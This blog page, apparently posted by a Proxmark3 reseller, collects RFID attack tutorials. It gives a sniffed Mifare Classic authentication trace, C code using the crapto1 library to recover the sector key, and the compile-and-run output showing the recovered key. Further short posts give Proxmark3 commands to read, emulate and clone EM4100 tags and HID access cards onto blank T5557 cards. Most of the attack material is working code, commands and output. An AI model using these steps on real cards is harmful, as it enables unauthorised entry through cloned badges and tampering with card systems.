2013年2月28日星期四

Getting the sector key of a mifare card

Author : xfpga Date : 2012-12-12 12:28:59

Getting the sector key of a mifare card(from google code of proxmark3)

Snooping on Mifare communications

This is a working example of how the sector keys of mifare cards can be retrieved with a Proxmark3, using the "crapto-1" package found on Google Code.

The trace below is taken from a hi14asnoop session followed by hf 14a list to get the beginning of the authentication & encryption protocol :

Commands	Comment
+ 561882 : 1 : 26	REQA
+ 64 : 2 : TAG 04 00	Answer reqa
+ 10217 : 2 : 93 20	Select
+ 64 : 5 : TAG 9c 59 9b 32 6c	The card’s UID is therefore : 9c 59 9b 32
+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30	Select with UID
+ 64 : 3 : TAG 08 b6 dd	Tag type (Mifare 1K)
+ 923318 : 4 : 60 00 f5 7b	AUTH (block 00)
+ 112 : 4 : TAG 82 a4 16 6c	Tag challenge (nt, "Nonce Tag")
+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 !	nr XOR ks1 (Nonce Reader, encrypted, 4 bytes), ar XOR ks2 (Answer Reader to Nonce Tag, encrypted)
+ 64 : 4 : TAG 5c ! ad f4 39 !	at XOR ks3 (Answer Tag, encrypted)

In order to extract the key for sector 0 from the exchange, we need the following elements :

Tag UID
Tag challenge (nt)
Reader challenge, encrypted (nr xor ks1, aka nr)
Reader response, encrypted (ar XOR ks2, aka ar)
Tag response, encrypted (at XOR ks3, aka at)

In the example above :

UID : 0x9c599b32
nt : 0x82a4166c
nr : 0xa1e458ce
ar : 0x6eea41e0
at : 0x5cadf439

Those can then be used in the following "crapto1" test program :

// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
 struct Crypto1State *revstate;
 uint64_t lfsr;
 unsigned char* plfsr = (unsigned char*)&lfsr;


 uint32_t uid                = 0x9c599b32;
 uint32_t tag_challenge      = 0x82a4166c;
 uint32_t nr_enc             = 0xa1e458ce;
 uint32_t reader_response    = 0x6eea41e0;
 uint32_t tag_response       = 0x5cadf439;

 uint32_t ks2                = reader_response ^ prng_successor(tag_challenge, 64);
 uint32_t ks3                = tag_response ^ prng_successor(tag_challenge, 96);

 printf("nt': %08x\n",prng_successor(tag_challenge, 64));
 printf("nt'': %08x\n",prng_successor(tag_challenge, 96));

 printf("ks2: %08x\n",ks2);
 printf("ks3: %08x\n",ks3);

 revstate = lfsr_recovery(ks2, ks3);
 lfsr_rollback(revstate, 0, 0);
 lfsr_rollback(revstate, 0, 0);
 lfsr_rollback(revstate, nr_enc, 1);
 lfsr_rollback(revstate, uid ^ tag_challenge, 0);
 crypto1_get_lfsr(revstate, &lfsr);
 printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);

 return 0;
}

Then compiled with :

#gcc -o test2 test2.c crapto1.c crypto1.c

And run like this :

./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]

you can use the gui soft to do so, it is the same.

proxmark3 read simulation and clone em4100 id card

em410xread `[clock]`

Reads the ID from an EM410x tag (the plot should contain the raw tag). Clock is optional, usually has a value of 64.

Example :

> loread> losamples 2000
> em410xreadAuto-detected clock rate: 64
EM410x Tag ID: 1a0041375d

em410xsim `[tag id]`

Simulates an EM410x tag with the specified ID. Example :

> em410xsim 1a0041375d
(The orange light will turn on. Press the button on the PM3 to stop emulating the tag.)

em410xwatch

Watches for an EM410x tag until it detects one. Essentially "loread + losamples 2000 + em410xread" until a tag is detected. Example :

> em410xwatchAuto-detected clock rate: 64
EM410x Tag ID: 1a0041375d

em410xwrite
copy em4100 id to a t5557 card.

proxmark3> lf em4x
help             This help
em410xread       [clock rate] -- Extract ID from EM410x tag
em410xsim        <UID> -- Simulate EM410x tag
em410xwatch      Watches for EM410x tags
em410xwrite      <UID> <'0' T5555> <'1' T55x7> -- Write EM410x UID to T5555(Q5)
or T55x7 tag
em4x50read       Extract data from EM4x50 tag
proxmark3>

--------
gezhi electronic
www.xfpga.com or ebay shop
email: xfpga@hotmail.com
qq:1074079485
tel: +86-13113330725
Michael

Clone HID card with proxmark3

Clone HID card with proxmark3
1. use lf hid fskdemo to read the hid card ' ID.

2. replace a blank t5557 card to the antenna,
use lf hid clone xxx(the ID you just read)

That is all.
here is a video of howto do it.
www.youtube.com/watch?v=MXljGb47IKM

snoop mifare card and extract the key video

snoop mifare card and extract the key video

www.youtube.com/watch?v=kTvb7tjbSTI

2013年2月26日星期二

snoop mifare card and extract the key video

snoop mifare card and extract the key video

www.youtube.com/watch?v=kTvb7tjbSTI